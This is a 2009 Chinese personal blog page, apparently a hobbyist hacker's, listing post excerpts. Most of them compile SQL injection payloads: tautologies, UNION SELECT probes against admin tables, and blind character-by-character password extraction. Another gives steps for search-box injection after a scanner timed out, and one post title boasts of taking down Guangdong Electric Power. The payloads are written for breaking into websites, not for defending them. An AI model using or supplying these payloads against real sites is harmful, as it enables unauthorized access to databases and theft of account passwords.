小炜'sBlog
百度空间 | 百度首页 
 
留言板
 

加油,呵呵
 
留言(1条)>>
     
 
个人档案
 
byxiaowei
男, 0岁
吉林 四平 
上次登录:
9天前
加为好友
 
   
 
订阅我的空间
 
已有人次访问本空间
 
订阅RSS  什么是RSS?

您也想拥有这样的空间?请点此申请。
     
 
背景音乐
 
 
RSS订阅
 
   
  
 
文章列表
 
学习C#
2009-10-24 17:32

朋友滴水在前阶段给我发来了一本《C#实用开发参考大全》,昨天晚上搭建了C#所需的环境,感觉还不错哦!慢慢来吧,功到自然成!^ ^

类别:|心情日记| | 评论(0) | 浏览()
 
拿下广东电力
2009-10-05 10:48
类别:|个人原创| | 评论(2) | 浏览()
 
经典的注入语句归总
2009-09-06 15:57
' or 1=1
' or '1=1
'/*
'%23
' and password='mypass
id=-1 union select 1,1,1
id=-1 union select char(97),char(97),char(97)
id=1 union select 1,1,1 from members
id=1 union select 1,1,1 from admin
id=1 union select 1,1,1 from user
userid=1 and password=mypass
userid=1 and mid(password,3,1)=char(112)
userid=1 and mid(password,4,1)=char(97)
and ord(mid(password,3,1))>111 (ord函数很好用,可以返回整形的)
' and LENGTH(password)
阅读全文>>
类别:|技术漫谈| | 评论(0) | 浏览()
 
详解常用的SQL注射语句
2009-09-06 15:52

1.判断有无注入点
' ; and 1=1 and 1=2
2.猜表一般的表的名称无非是admin adminuser user pass password 等..
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) ---判断是否存在admin这张表
3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.
and 1=(select count(*) from

阅读全文>>
类别:|网络精华| | 评论(0) | 浏览()
 
搜索型注入的入侵技术
2009-09-06 14:49
简单的判断搜索型注入漏洞存在不存在的办法是先搜索',如果出错,说明90%存在这个漏洞。然后搜索%,如果正常返回,说明95%有洞了。

然后再搜索一个关键字,比如2006吧,正常返回所有2006相关的信息,再搜索2006% 'and 1=1 and '%'='和2006%' and 1=2 and '%'=',存在异同的话,就是100%有洞了。

我这里看出有上面说的洞后开始用nbsi来扫,结果总是超时,郁闷,看来要手工来暴需要的信息了。。。

阅读全文>>
类别:|技术漫谈| | 评论(0) | 浏览()
 
更多文章>>
     


©2009 Baidu